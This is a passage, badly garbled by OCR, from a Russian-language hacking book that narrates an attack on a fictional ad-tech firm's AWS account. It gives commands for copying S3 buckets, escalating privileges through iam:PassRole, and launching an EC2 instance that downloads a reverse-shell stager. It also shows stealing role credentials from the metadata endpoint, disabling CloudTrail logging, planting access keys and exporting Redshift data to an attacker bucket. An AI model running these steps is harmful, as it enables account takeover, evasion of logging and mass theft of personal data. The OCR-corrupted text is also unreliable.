статьи про политические партии, выглядывающие из-за каждой стро- 
ки данных, и оплакивать нашу иллюзорную демократию. 


244 глава 12 


Поиск необработанных данных 


Бакет дгеіѕсһ-Ғіпапсе оказался победителем. Давайте проверим 
остальные бакеты: 


гоо@Ро\п{1 : ~поёеБоокѕ/# едгер -В «$3[а|п]://» * 

53а: / /дге$сй-Падоор/епд\пе/а{-рег{/... 

53а: / /агеѕсһ-һайоор-иѕ1/пј/тр/&ћігдрагёу/ѕедтеп&ѕ/... 
53а: / /агеѕсһ-һайоор-еџ1/ае/ѕосіа1/ргоЁ\л1еѕ/тарріпод/... 
- -Сокращено- - 


Профили, соцсети, сегменты и так далее. Названия файлов выглядят 
заманчиво. Это вполне могут быть пользовательские данные, которые 
нам нужны. Обратите внимание, что название бакета дгеіѕсћ-һайоор- 
451 подразумевает региональное разделение. Сколько существует ре- 
гионов и, следовательно, сегментов Надоор? 


гооЁ@Роіпї1:~/# амѕ 53арі 11$%-БисКее$ \ 
--ргоЁі1е даёа1 \ 
--дџегу “Вискеѕ[].М№ате”\ | гер Надоор 


дгеіѕсһ-һайоор-иѕм1 
дгеіѕсһ-һайоор-еџм1 
дгеіѕсһ-һайоор-арѕе1 


Мы находим бакеты Надоор для каждого из трех регионов АМ/5 
(Северная Калифорния, Ирландия и Сингапур). Затем мы скачиваем 
1000 файлов с дгефсн-Бадоор-изм1, чтобы посмотреть, какие арте- 
факты там содержатся: 


гоо@Ро1п{1:-/# амѕ 53арі 115+-објесіѕ-у2 \ 
--рго Де а+а1 \ 

- -Бискеё=дгеёѕсһ-һайоор-иѕи1 \ 

--пах-1ёемѕ 1000 


"Кеу": "епдіпе/айуегїіѕег-ѕеѕ510п/2019/06/19/15/08/иѕег ѕеѕѕіопѕ_ѕЁаїѕ.рагдиеЁ", 
"Кеу": "епдіпе/айуегїіѕег-ѕеѕ510п/2019/06/19/15/09/иѕег ѕеѕѕіопѕ_ѕЁаїѕ.рагдиеЁ", 
- -Сокращено- - 


Мы видим какие-то файлы с расширением .рагдие*. Рагдие{ – это 
формат файла, известный своей высокой степенью сжатия, которая 
достигается за счет хранения данных в столбчатом формате. Он осно- 
ван натом факте, что в большинстве баз данных столбец, как правило, 
хранит данные одного типа (например, целые числа), тогда как в стро- 
ке чаще хранятся данные разных типов. Вместо того чтобы группиро- 
вать данные по строкам, как это делают большинство механизмов БД, 
Рагадџеї группирует их по столбцам, таким образом достигая степени 
сжатия более 95 %. 
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Установим необходимые инструменты для распаковки и манипу- 
лирования файлами .рагдиеї, а затем откроем несколько случайных 
файлов: 


гооЁ@Роіпё1:~/# руЁһоп -м рір іпѕёа11 рагаџеё-с1л. 
гооЁ@Роіпї1:~/# рага 02/иѕег_ѕеѕѕ1іопѕ_ѕаёѕ.рагаџеЁ -һеай 100 
иѕегій = с9е261905962#а0Ь344301540е615662864Ь2с9Ғ 
іпіегеѕі_ѕедтепі = 4878647678 

15 = 1557900000 

іме _ѕрепё = 3 

1аѕ аа = 53#407233а5Ғ0Ғе9264462ағбааб49Ға 

1аѕ _ргоуійег = 34 

1р.део.х = 52.31.46.2 

- -Сокращено- - 


гоої@Роіпё1:~/# рага 03/регЁ_ѕёаѕ.рагдџеё -һеаа 100 
ССК = 2 

геҒеггег = 9735842 

деуісеуІр = 031084Ь-65#2-417с-884-ЬЬ9081111400 

- -Сокращено- - 


гооЁ@Роіпё1:~/# рага 03/ѕосіа1_ѕаіѕ.рагдџеё -һеай 100 
ѕосіа1_ѕедтепё = 61895815510 

ҒЫ ргоДе = 3232698 

іпѕёа_ргоЁіЛе = 987615915 

ріпёегеѕі_ргоЁіЛе = 57928 

- - Сокращено- - 


Мы видим здесь идентификаторы пользователей, социальные 
профили, сегменты интересов, время, потраченное на рекламу, гео- 
локацию и другую весьма деликатную информацию о поведении 
пользователей. Ну что же, наконец-то мы получили осязаемое воз- 
награждение за наши усилия. Данные пока непонятны, хранятся 
в специальном формате и с трудом поддаются расшифровке, но со 
временем мы с этим разберемся. 

Мы могли бы выделить несколько терабайт дискового простран- 
ства на нашей машине и приступить к полной краже этих трех сег- 
ментов. Вместо этого мы просто проинструктируем А\М/$ скопировать 
бакет в нашу учетную запись, но сначала нужно добавить кое-какие 
настройки, чтобы увеличить скорость: 


гоо@Ро1п{1:-/# амѕ сопҒідиге зе деРаи\{.$3 .тах_сопсиггеп®_гедиезЕ5 1000 
гооЁ@Роіпё1:~/# амѕ сопАдиге зе ЧеРаи\+.$3.тах_диеие_$12е 100000 
гоої@Роіпё1:~/# амѕ $3 ѕупс 53: / /дгеЁѕсһ-һайоор/ $3: //ту-дгеёѕсһ-һайоор 


У нас есть все данные из трех бакетов Найоор. Однако не слишком 
радуйтесь; эти данные практически невозможно обработать без серь- 
езного исследования, знания предметной области и, конечно же, вы- 
числительной мощности. Посмотрим правде в глаза, мы игроки дале- 
ко не ИЗ ЭТОЙ ЛИГИ. 
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Целая армия экспертов по данным компании СтезсВ РоН@со зани- 
мается такой обработкой каждый день. Почему бы нам не использо- 
вать их работу, чтобы украсть конечный результат, вместо того чтобы 
изобретать велосипед с нуля? 


Кража обработанных данных 


Обработка и преобразование данных в ЗрагК обычно являются лишь 
первым этапом жизненного цикла данных. Как только они обогаще- 
ны другими входными данными, перекрестными ссылками, отфор- 
матированы и масштабированы, они сохраняются на втором носи- 
теле. Там их могут изучить аналитики (обычно через какой-нибудь 
$ОТ-подобный движок) и в конечном итоге передать алгоритмам 
обучения и моделям прогнозирования (которые, конечно, могут ра- 
ботать или не работать в Ѕрагк). 

Вопрос в том, где СР хранит свои обогащенные и обработанные 
данные. Самый быстрый способ выяснить это - поискать в блокнотах 
Јируѓег намеки на упоминания аналитических инструментов, 501- 
подобные запросы, графики и информационные панели и т. д. (лис- 
тинг 12.9). 


Листинг 12.9. 501 -запросы, используемые в блокнотах Лируег 


гооЁ@Роіп 


1:-поёеБоокѕ/# едгер -В -5 «591 | магеһоиѕе | зпомТакКе | гейѕһіҒ+ | Біддџегу» * 


геѕһіҒє_епдроіпё = "ѕапдбох.сіс355081с3х.еџ-меѕЁ-1. гейѕһіЁЕ. атахопам$ . сом" 


епдіпе ѕЁгіпд = "роѕёдгеѕд1+рѕусорд2: //%5:%50%5 : 5439 /Чафа1аКе" \ 
% ("апа1уёісѕ-го", "1е${", гедѕһіҒЕ_епіроіпё) 


епдіпе = 


51 = 


сгеаіе епдіпе(епдіпе_ѕёгіпд) 


ѕе1есі іпѕегііоп ій, сіг, срт, ад$_га о, ѕедтепЁїр,...; 


--5пір-- 


Возможно, мы нашли что-то, заслуживающее внимания. Кеаӣѕћіё – 
это управляемая база данных РоѕіотеЅ01. на стероидах, настолько 
раздутая, что называть ее базой данных уже неуместно. Ее часто на- 
зывают озером данных. Она бесполезна для запроса небольшой табли- 
цы из 1000 строк, но дайте ей несколько терабайт входных данных, 
и она ответит молниеносно! Ее мощность может увеличиваться до тех 
пор, пока у А\МУ$ есть свободные серверы (и, конечно, у клиента есть 
деньги, которые он может потратить). 

Выдающаяся скорость, масштабируемость, возможности парал- 
лельной загрузки и интеграция с экосистемой А\М/5 делают Кедз МЕ 
одной из самых эффективных аналитических баз данных в этой об- 
ласти - и, возможно, это ключ к нашему спасению! 
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К сожалению, полученные нами учетные записи относятся к базе 
данных песочницы с неактуальными данными. Кроме того, ни один 
из наших ключей доступа АМ5 не может напрямую запрашивать Вед- 
ЗЫ# АРІ: 


гооё@Роіп1:~/# анѕ гейѕһіҒЕ деѕсгіђе-с1иѕ+егѕ \ 
--ргоҒіЛе=даёа1 \ 
--гедіоп еџ-меѕ-1 


Ап еггог оссиггед (Ассеѕ5репіей) мћеп са114п9 {Ве реѕсгіБеС1иѕёегѕ... 


Кажется, пришло время для повышения привилегий. 


Повышение привилегий 


Просматривая дюжину полученных нами ключей доступа к ТАМ, МЫ 
понимаем, что все они принадлежат к одной и той же группе ТАМ 
и, таким образом, имеют одни и те же базовые привилегии - то есть 
чтение/запись в несколько сегментов в сочетании с некоторыми лег- 
кими разрешениями ТАМ только для чтения: 


гооё@Роіп1:~/# анѕ Там 11$%-дгоир$ - -ргоҒіЛе=1еѕ11е 
"СгоирМате": "ѕрагк- 53", 


гооЁ@Роіпї1:~/# амѕ іат 115-дгоирѕ --ргоЁЛе=тагс 
"СгоирМате": "ѕрагк-53", 


гооё@РоіпЁ1:~/# анѕ іам 115Ё-дгоирѕ --ргоРДе=сатеДЛа 
"СгоирМате": "ѕрагк-деБид", 


"СгоирМате": "зрагК-$3", 


- - Сокращено- - 


Постойте-ка. Пользователь сате 1іа принадлежит к дополнитель- 
ной группе под названием 5рагКк-ЧеБчд. Рассмотрим подробнее поли- 
тики, привязанные к этой группе: 


гоо@Роіпё1:~/# аиз Там 115&-аёёасһ-дгоир-ро\ісіеѕ --дгоир-паме ѕрагк-йеБид --ргоЛе=саме {а 


"Ро1ісуМћате": "АтагопЕС2ЕШЛЛАссеѕѕ", 
"Ро1ісуМате": "іат-раѕ5-го1е-ѕрагк", 


Прекрасно. Некая Камелия здесь, вероятно, является лицом, от- 
вечающим за обслуживание и запуск кластеров Ѕрагк, отсюда и две 
предоставленные ей политики. Полный доступ к ЕС2 открывает дверь 
для более чем 450 возможных действий в ЕС2, от запуска экземпляров 
до создания новых УРС, подсетей и почти всего, что связано с вычис- 
лительной службой. 
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Вторая политика нестандартная, но легко догадаться, для чего она 
предназначена: она позволяет назначать роли экземплярам ЕС2. Мы 
запрашиваем последнюю версию документа политики, чтобы под- 
твердить наше предположение: 


# получаем версию политики 

гооЁ@Роіпї1:~/# амз іам деё-ро\ісу \ 

- -ро1ісу-агп агп:амѕ :іап: :983457354409:ро1ісу/іат-раѕ5-го1е \ 
--ргоЁіЛе сате1Лла 


"РеҒаџ1Мегѕіоп1д": "\1", 


# получаем содержание политики 

гооЁ@Роіпї1:~/# амѕ іам деё-ро\ісу-мегѕіоп \ 

- -ро1ісу-агп агп:амѕ :іап: :983457354409:ро1ісу/іат-раѕ5-го1е \ 
--мегѕіоп у1 \ 

--ргоЁіЛе сате1Лла 

"Асёіоп" : "Тат:Раз$Во\е", 

"Везоигсе": "*" 

- -Сокращено- - 


СР, возможно, не полностью осознает это, но с помощью действия 
ТАМ Раѕ5Ао1е они неявно предоставили дорогой Камелии - и, соот- 
ветственно, нам – полный контроль над своей учетной записью АМҮ. 
Раѕ5Ко1е – мощное разрешение, которое позволяет нам назначать эк- 
земпляру любую роль Ө, включая администратора. Обладая полным 
доступом к ЕС2, Камелия также управляет экземплярами ЕС2 и может 
запустить машину, пометить ее ролью администратора и получить 
себе учетную запись А\М5. 


В отличие от МХК Ай, СР не удосужилась ограничить 
вызовы [АМ статусом «только для чтения» для пользователя, отправ- 
ляющего вызов, – распространенная оплошность многих компаний, ко- 
торые по умолчанию назначают список [АМ «* и получают разрешения 
«*» (неограниченные) для своих пользователей. 


Давайте посмотрим, какие роли мы можем передать экземпляру 
ЕС2, действуя от имени Камелии. Единственным ограничением яв- 
ляется то, что роль должна иметь ес2 . ата7опам$ . сот в своей политике 
доверия: 


гоо@Ро1п{1:-/# амѕ іам 11$4-го\е$ --ргоЁЛе сате11іа \ 

| 39 -г ‘.Во\е$[] | „Во\еМмаме + “, “+ \ 
.АѕѕитеАо1еРо1ісуроситеп.Ѕёаёемепё[ ].Ргіпсіра1.Ѕегуісе” \ 
| гер “ес2.амагопамѕ.сот” 

- -Сокращено- - 

јепкіпѕ-сіса, ес2.амагопам$ . сот 

ЭепКАп$-)06$, ес2.амагопам$ . сот 
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гипаеск, ес2.атагопамѕ. сот 
срагК-таз%ег, ес2.атагопамѕ. сот 


Среди ролей мы видим Випаеск, который может оказаться нашим 
желанным спасителем. КипаескК - это инструмент автоматизации для 
запуска сценариев администрирования в инфраструктуре. Создате- 
ли инфраструктуры СР, похоже, не слишком стремились к использо- 
ванию Јепкіпѕ, поэтому они, вероятно, планировали основную часть 
своей рабочей нагрузки с помощью Випаеск. Давайте воспользуемся 
учетной записью Камелии, чтобы посмотреть, какие разрешения есть 
у Кипаеск: 


гоої@Роіпё1:~/# амз Лам деё-аёёасһей-го1е-ро1ісіеѕ \ 
--гое-паме гипеск \ 
--ргоР Де самеДЗа 


"Ро1ісуМате": "гипдеск-топо-ро|1су", 


# получаем версию политики 
гоо@Ро1п{1:-/# амѕ іам деё-ро\ісу --ргоРДе сате11іа \ 
- -ро1ісу-агп агп:амѕ :іам: :983457354409 : ро1ісу/гипіеск-топо-ро\ісу 


"РеҒаџ1УегѕіопІа": "13", 


# получаем содержание политики 

гооЁ@Роіпё1:~/# амѕ Там деё-ро1ісу-мегѕіоп \ 

--мегѕіоп %13 \ 

--ргоЁіЛе саме11іа \ 

- -ро1ісу-агп агп:амѕ :1ам: :983457354409:ро1ісу/гипіеск-топо-ро1ісу 


"Асёлоп":["ес2:%", "есг:*", "іат:*", "гӣѕ:*", "геаѕһіҒё:*",...] 
"Везоигсе": "*" 
- - Сокращено- - 


Да, это та роль, которая нам нужна. Она имеет почти полные права 
администратора в АМҮ. 

Поэтому план состоит в том, чтобы развернуть экземпляр в той же 
подсети, что и кластер ЅрагКк. Мы аккуратно воспроизведем атрибуты 
легального экземпляра, чтобы скрыть его на виду: группы безопасно- 
сти, теги – абсолютно все. Для начала получим атрибуты, чтобы позже 
мы могли их имитировать: 


гооё@Роіп1:~/# анѕ ес2 йеѕсгібе-іпѕёапсеѕ --ргоҒіЛе сате1Ліа \ 
--РА\ег$ ‘Мате=жад: Маме ,Ма1џеѕ=*ѕрагк*’ 


- - Сокращено- - 
"Тадѕ": 

Кеу: Мате Ма1џе: ѕрагк-таѕёег-ѕЁгеатіпд 
"Ттаде!9": "амі -020#9еа15с1778с9с", 
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"ІпѕёапсеТуре": "т5.х1агде", 
"ЅирпеёІа": "ѕирпеё-00580е48", 
"Ѕесигі&убгоирѕ": 
СгоирМате: ѕрагк-таѕег-а11, Сгоур14: 59-06а91040а5042Ғе04 
СгоирМате: ѕрагк-могкег-а11, СгоурТ4: $9-004е215с7с864с425 
- -Сокращено- - 


Мы точно знаем, что рабочие процессы Ѕрагк могут подключаться 
к интернету через порт 4435, поэтому мы просто копируем и вставля- 
ем группы безопасности, которые мы только что подтвердили, и за- 
пускаем новый экземпляр с профилем гипдесК с этими атрибутами: 


гооє@Роіпі1:~/# амѕ ес2 гип-іпѕёапсеѕ \ 

--імаде-1й аті-020#9еа15с1778с9с \ 

--соџпЁ 1 \ 

--іпѕЕапсе-уре м3 .мед\им \ 

- -іат-іпѕёапсе-ргоҒіЛе гипдеск \ 

--Ѕѕирпеё-14 ѕирпеЁ-00580е48 \ 

--ѕесигіёу-дгоир-105 59-06а91040а5042Ғеб4 \ 

- -ад-ѕресіҒісаіопѕ * еѕоџигсеТуре=іпѕЕапсе,Тадѕ= 
[{Кеу=Маме ,Ма\џе=ѕрагк-ногкег-5739есеа19а4}]? \ 

--изег-дафа Ее: //ту _иѕег_ даа. ѕһ \ 

--ргоғіЛе сатме\1ла \ 

--гедіоп еи-меѕ-1 


Скрипт му_иѕег_ даа. 5һћ, переданный как пользовательские дан- 
ные, загрузит нашу обратную оболочку: 


#1 /Біп/Баѕћ 

мде һё&рѕ: //агеёѕсһ-ѕрагк-еш.53. атагопамѕ.сот/ѕЁадег 
сһтоа +х . /ѕЕадег 

. [ѕ+адег& 


Мы запускаем предыдущую команду АМ и, конечно же, через ми- 
нуту или две получаем оболочку с правами администратора, которая, 
как мы надеемся, станет нашей окончательной оболочкой в этом при- 
ключении: 


[*] ћрѕ://0.0.0.0:443 һапд\ііпд гедиеѕї Ғгот... 

[*] ћрѕ://0.0.0.0:443 һапд\ііпд гедиеѕї Ғгот... 

т5# ехр1оі&(ти1+1 /Пап ег) > ѕеѕѕіопѕ -і 9 

[*] Ѕёагёіпд іпёегасёіоп мВ 9... 

мефегргефег > ехесифе -1 -Н -Ғ сиг\ -а \ 

ВЕЕр: //169.254.169.254/1афе$+ /мефа-Фафа/\ат/зесиг\у-сгедеп\а1$ /гипдеск 


"АссеѕѕКеуІа" : "АЅТІА4478К6А536ҮМ20С0", 
"ЅесгеЁАссеѕ5Кеу" : "гХ80А+22СМ№аХаНг12амМоСујрІни2Е0гоНҒу#пСп ", 
"Токеп" : "1002632р2210Х2\13ЕЈг///////// /мЕасим1.Ха1сз0+М5Ј... 
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Великолепно! У нас есть куча ключей и токенов высшего уровня 
безопасности, принадлежащих роли гипдеск. Теперь, когда у нас есть 
эти ключи, давайте запросим перечень классических сервисов отсле- 
живания, чтобы увидеть, какие из них активны (СоцаТгай, Сиагариѓу 
и Ассеѕѕ Апа]ухег): 


гооЁ@Роіпї1:~/# ехрогЕ АМ$_РВОЕТЬЕ=гГиПдеск 
гооЁ@Роіпё1:~/# ехрогЕ АМЅ_КЕСІОМ№=еџ-меѕ+-1 
гооє@Роіп1:~/# анѕ с1оџйёгаі1 деѕсгіђе-ЁЕгаі15 


"Мате": "аддгедаед", 
"53ВискеМате": "дгеЁѕсһ-аддгед-1095", 
"Іпс1идеС1оБа1ЅегуісеЕуепѕ": Ёгџе, 
"ІѕМи11ВедіопТгаі1": гие, 
"НотеВедіоп": "еи-мез{-1", 

© "Наѕ1пѕідһЕЅе1есёогѕ": Ға1ѕе, 


гооЁ@Роіпё1:~/# амѕ диагійиёу 115 -йеёесёогѕ 
"РеёесёогІйѕ": [] 


гооё@Роіп1:~/# анѕ ассеѕѕапа1уғег 115#-апа1уғегѕ 
"апа1уғегѕ": [] 


Понятно. С1оцаТгаЙ включен, как и ожидалось, поэтому логи до- 
ступа могут быть проблемой. Но в целом никаких сюрпризов. Тем не 
менее Іпѕіећіѕ отключен Ө, поэтому мы можем позволить себе не- 
сколько вызовов АРІ массовой записи, если это необходимо. Сиага- 
Рибу и Ассеѕѕ Апа[улег возвращают пустые списки, поэтому оба они 
также отсутствуют в выводе. 

Давайте пока не будем беспокоиться о логах и вставим ключ досту- 
па в учетную запись Камелии, чтобы улучшить устойчивость нашего 
доступа. Ее привилегий вполне достаточно для восстановления до- 
ступа к аккаунту СР: 


гооЁ@Роіпё1:~/# амѕ с1оџйёгаіл1 ирӣа+е-ёгаі1 \ 
--паме аддгедаеа \ 

- -по-іпс1ийе-д1оБа1 -ѕегуісе-еуепёѕ \ 

- -по-15-ми1і - гедіоп 


гооё@Роіп1:~/# анѕ іам 115Ё-ассеѕ5-Кеуѕ --изег-паме саме1Ліа 


"АссеѕѕКеуІа": "АКТА447ВКби$ХМОСМИХ7", 

"Ѕаёиѕ": "Ас ме", 

"Сгеаёераёе": "2019-12-13718:26:177" 

гооё@Роіп1:~/# анѕ іат сгеаёе-ассеѕѕ-Кеу --изег-пате саме11іа 


Г 
"АссеѕѕКеу": { 
"ОѕегМ№ате" : "сате11ла", 
"АссеѕѕКеуІа": "АКІА4472АК6А5528В4С0Х", 
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"бесге{АссеззКеу": "10К/ /иуЕ5Росб\УКуе0МЕЧр7 ЕЕ 5ми\$ТиХ /РЕТ7СВ", 
"Сгеаёерае": "2019-12-21718:20:047" 


Тридцать минут спустя мы очищаем экземпляр ЕС2 и снова вклю- 
чаем многорегиональное ведение лога СІоџаТгаі: 


гооЁ@Роіпї1:~/# амѕ с1оийёгаіл ирӣа+е-Егаі1 \ 
--пате аддгедатед \ 

- -іпс1ийе-д1оБа1 -ѕегуісе-еуепёѕ \ 

- -15 - тиі - гедіоп 


Наконец-то мы получили стабильный доступ администратора 
к учетной записи СР АМ! 


Проникновение в Кеб Ш 


Теперь, когда у нас есть защищенный доступ к учетной записи АМ 
компании СР, давайте покопаемся в ее кластерах Кез (лис- 
тинг 12.10). В конце концов, это и было основной целью захвата учет- 
ной записи. 


Листинг 12.10. Список кластеров Веаѕһіјї 


гооє@Роіп1:~/# амѕ гейѕһіҒЕ еѕсгіђе-с1иѕЁегѕ 
"Сиѕ%егѕ": [ 
С1иѕЁегІйепёі Ғіег: Ьі, 
МодеТуре: газ.16х1агде, М№тБегО#М№ойеѕ: 10, 
"ОВМате": "даёа1аке" 
- -Сокращено- - 


С1иѕёегІйепёі Ғіег: запдБох 
МодеТуре: с2.1агде, №тбегО#№ойеѕ: 2, 
"ОВМате": "даёа1аке" 

-- Сокращено- - 


С1иѕ&егІйепёі Ғ\ег: герог&іпд 
МодеТуре: йс2.8х1агде, М№тБегО#М№ойеѕ: 16, 
"ОВМаме": "даёа1аке" 

-- Сокращено- - 


С1иѕёегІйепёі Ғ\іег: Ғіпапсе, №деТуре: 4с2.8хТагде 
Митбего#№ойеѕ: 24, 
"ОВМаме": "даёа1аке" 

-- Сокращено- - 


Мы получаем кучу кластеров с ценной информацией, работающих 
на Кеаѕһћі&. Наличие Кейѕһій было хорошим намеком. Никто не ста- 
нет просто так создавать кластер газ.16х1агде Ө, который поддержи- 
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вает 2,5 ТБ на узел. Этот малыш обходится компании от 3000 долларов 
в день, что делает его еще более заманчивым для изучения. Финансо- 
вый кластер также может содержать интересные данные. 

Давайте поближе рассмотрим информацию о кластере Бі в листин- 
ге 12.10. Исходная база данных, созданная при появлении кластера, 
называется дафа\аКе. Пользователь адт\п – это традиционный пользо- 
ватель гоо*. Кластер доступен по адресу Б\.саеб$\)50т2р.ец-ме$*-1. 
геаѕћіғҒ+. апахопам$ . сом на порту 5439: 


СТиз{ег$: [ 

СТизкегТ деп Рег: запдБох-{е$+, 
№одеТуре: га3З.16х1агде, 
Мазтег/зегпаме: гоо 

ОВ№аме: Чафа|акКе, 


Епроіпі: { 
Аайгеѕ5: Бі. сіс355081с3х.еџ-меѕЁ-1. гейѕһіҒЁ. апахопаи$ . сом, 
Роге: 5439 
} 
\Урсбесиг\{убгочрТ9: $9-913а64е4, $9-а531614е, 59-042с4аз#80а7е262с 
- - Сокращено- - 


Теперь проанализируем группы безопасности на предмет наличия 
правил фильтрации, предотвращающих прямые подключения к базе 
данных: 


гооЁ@Роіпї1:~/# амз ес2 дезсг\Бе-зесиг\у-дгоир$ \ 
--9гоир-19$ $9-93а64е4 $9-а53#614е 


"ІрРегтіѕѕіопѕ": [ { 

"ТоРогї": 5439, 

"ІрРгоёосо1": "Еср", 

"ІрАапдеѕ": [ 
{ "СійгІр": "52.210.98.176/32" }, 
{ "СійгІр": "32.29.54.20/32" }, 
{ "СіагІр": "10.0.0.0/8" }, 
{ "СійгІр": "0.0.0.0/0" }, 


Мой любимый диапазон ІР-адресов всех времен: 0.0.0.0/0. Этот 
неотфильтрованный диапазон ІР-адресов, вероятно, просто исполь- 
зовался в качестве временного доступа, предоставленного для тести- 
рования новой интеграции ЅааЅ или для выполнения некоторых за- 
просов... но теперь он достался нам. Справедливости ради, поскольку 
у нас уже есть доступ к сети СР, для нас это не имеет большого значе- 
ния. Ущерб уже нанесен. 

Кедѕћі настолько тесно связан со службой ТАМ, что нам не нужно 
искать новые учетные данные. Поскольку у нас есть прекрасное раз- 
решение гейѕћіЁ: *, прикрепленное к нашей роли гипдеск, мы просто 
создаем временный пароль для любой учетной записи пользователя 
в базе данных (включая гоо): 
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гооє@Роіпі1:~/# амѕ деЁ-с1иѕЁег-сгейепёіа15 \ 
--96-изег гоо \ 

--96-паме даёа\аке\ 

- -с1иѕёег-ійепёіҒіег Бі \ 

--бигаёіоп-ѕесопіѕ 3600 


"рБуѕег": "ТАМ: гооЁ", 
"рБРаѕѕмогӣ": "АѕКЕх8еХіӨпКМКІХРНКУМҒХӨЕЅ5еиИт59АһеадүһТСокЕе" , 
"Ехрігаіоп": "2020-12-29711:32:25.7557" 


Имея на руках эти учетные данные, нам нужно просто загрузить 
клиента Роѕїртеѕ$0їІ и указать ему на конечную точку Кеаѕћі: 


гооЁ@Роіпї1:~/# арЕ іпѕёа11 роѕёдгеѕд1 роѕёдгеѕа1 -сопЁгіБ 
гооё@Роіпё1: ~ /# РСРАЅЅИОВЮ= ’АѕКЕх8еХіОпіКМІКІХ...° \ 

рѕа1 \ 

-ћ Б1.сӣс355981с3х.еџ-меѕё-1. гейѕһіҒ. атагопамѕ. сот \ 

-0 гооЁ \ 

-4 даёа1аке \ 

-р 5439 

-с “ЅЕГЕСТ фаБЛепаме, со\имппате ЕВОМ Рб_ТАВЕЕ_ОЕЕ мпеге ѕсһетапате \ 
=°риБ1іс’» > 115 фа Ле$_со\имп$. хе 


Мы экспортируем полный список таблиц и столбцов, хранящихся 
в РС ТАВІЕ РЕБ, и оказываемся в одном шаге от интересующих нас 
данных: 


гоо@Ро1п{1:-/# са 145% +аБ1еѕ_со1итпѕ.ЕхЕ 
ргоР Це, 1а 

рго Де, пате 

рго Де, Таз{паме 

рго Де, ѕосіа1 ій 

- -Сокращено- - 

ѕосіа1, 19 

ѕосіа1, 1іпк 

ѕосіа1, ҒЬ 14Кеѕ 

ѕосіа1, ҒЫ іпёегеѕЁ 

- -Сокращено- - 

Тахопоту, зедтеп{_пате 
фахопоту, ій 

{ахопоту, геасћ 

ахопоту, ргоуійег 

- -Сокращено- - 

іпіегеѕёдгарһ, 19 
іпёегеѕёдгарһћ, 1пР\иепсе_ах15 
іпіегеѕёдгарһћ, асііоп_ахіѕ 

- -Сокращено- - 


Ничто не сравнится со старой доброй базой данных 801, где мы 
можем запрашивать и объединять данные в свое удовольствие! Этот 
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кластер Вед М является местом сосредоточения почти всех данных, 
поступающих в инфраструктуру Стеїѕсһ Роййсо. 

Мы нашли данные, связанные с эффективностью рекламы МХК 
и ее влиянием на поведение людей в интернете. У нас есть полная 
информация об их онлайн-активности, включая список всех посе- 
щенных ими веб-сайтов, на которых есть тег ЈауаЅсгірі, связанный 
с СР, и даже профили в социальных сетях, привязанные к людям, до- 
статочно наивным, чтобы поделиться такими данными с одним из 
скрытых партнеров СР. Кроме того, конечно, у нас есть классические 
сегменты данных, купленные у поставщиков данных, и то, что они 
называют «похожими сегментами», то есть интересы населения А, 
спроецированные на население Б, потому что они имеют некоторые 
общие свойства, такие как используемое ими устройство, их поведе- 
ние в сети и так далее. 

Попробуем создать 501-запрос, собирающий большую часть этих 
данных в один вывод, чтобы получить более четкую визуализацию 
происходящего: 


ЅЕГЕСТ р.9р_19, р.паме, р.1аѕёпате, р.еуісеТуре, р.1аѕё Лос, 
ІІЅТАСС(а.геҒегег), ѕ.11пк, ГІЅТАСС(5.ЁЬ іпїегеѕї), 
ЕТ5ТАСС( +. ѕедтеп пате), 

і.асііоп у, і.іпҒиепсе х, і.імри1ѕе 2 


ЕВОМ ргоҒіЛе р 

З01№ ад$ а оп р.айѕ 14 = а.ій 

Ј0ІМ ѕосіа1 $ оп р.ѕосіа1_1й= 5.14 

Ј0ІМ Ёахопоту Ё оп р.ѕедтеп 1а = +.19 
Ј0ІМ іпёегеѕдгарһ і оп р.дгарһ_ 1 = 1.19 
СВОУР ВУ р.9р_1а 


ГІМІТ 2000 

Барабанная дробь. Готовы? Выпускайте тигра! Вот один из клиентов, Фрэнсис Дима: 
р.9р_14: 04108с198#006204е9800998есЁ8427е 

р.пате: Ріта 

р.Лаѕёпапе: Егапсіѕ 

р.іеуісеТуре: ірһопе Х 

р.1аѕі Лос х: 50.06.16.3.№ 

р.1аѕі Лос у: 8.41.09.3.Е 

а.геЁегег: ммм. оКіпама. сот/огегМеа1, 


ЕгапѕЁегиіѕе. сот/90537е4629#87Ғес18е451..., 
а1јагеега.сот/пемѕ /һопд-Копд-ргоїеѕї... 
ЛАпк: һер : / /ммм.ГасеБоокК . сот/ іта. геа1мог1а. 53301 
Ѕ.ЁЬ іпЁегеѕё: госк, мефоо, ҒідһЕДЕгеейот, 1еда1іғеїІі... 
Е. ѕедтепЕ_пате:ро11&1сѕ Леапеа Леғё, 
ро11+1ісѕ тапідеѕаїіоп_га\11у, 
һеа1+һ тейесіпе ауегаде, 
һеа1єһ сһгопіса1 раіп,... 
і.іпҒшепсе х: 60 


м 


1.асііоп_у: 95 
і.ітри1ѕе 2: 15 
- - Сокращено- - 
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Вот что вы можете узнать о людях, всего лишь объединив несколь- 
ко трекеров. С беднягой Димой связано более 160 сегментов данных, 
описывающих все, от его политической деятельности до кулинарных 
пристрастий и истории болезни. У нас есть последние 500 полных 
ОЋІ-адресов, которые он посетил, его последнее известное местона- 
хождение, его профиль в Еасебоок, полный его симпатий и интересов, 
и, что наиболее важно, карта характера с указанием уровня его влия- 
ния и взаимодействия с рекламой. Только подумайте, как легко СР 
будет воздействовать на этого человека – любого человека! – влиять 
на его мнение о любых неоднозначных темах и, скажем прямо, про- 
давать демократию тому, кто больше заплатит. 

Финансовый кластер – еще одно Эльдорадо. Это больше, чем прос- 
то данные о транзакциях, там хранится вся доступная информация 
о каждом покупателе, который проявил хоть малейший интерес 
к услугам Стеїѕсһ РоЙ4со, а также о заказанных им рекламных мате- 


риалах: 

с.1а: 357 

с.папе: ТЕВ 

с.а44гез$: Аџуѕӣае1Кайе 51-Н5 

с. Су: Атѕёегдат 

с.гемепие: 549879.13 

с.сгеаімеѕ: 53: / /Сгеѕсһ-ѕёид\о/1ЕК/9912575Ғеба4ау.тр4,... 
с.сопёасё: јап.мапигБіп@ийгс. сот 

р.Ёџппе15: тхайѕ, іпѕЁадгат, ҒасеБооК,... 


с1ісК_гаёе: 0.013 
геа1_у151: 0.004 
- -Сокращено- - 


ип1оаа ('<НУСЕ_$501_ОЧЕВУ>') +о '$3: / /дафа-ехрогЕ-ргоДез/др/' 


Мы полностью экспортируем эти два кластера в принадлежащий 
нам бакет 53 и начинаем готовиться к следующему шагу – пресс-кон- 
ференции, фильму, может быть, книге. 


Дополнительные ресурсы 


• Список компаний, использующих 5рагК: №#р5./брагк.араспе.ога/ром- 
егеа-Бу.НЕтИ. 

• Список действий Ѕрагк из документации Арасһе Ѕрагк: ИНру/Ьй. 
[у/Заиб 4. 

• Подробная информация о расценках Веа$ М: №Нр$//ам/.атагоп. 
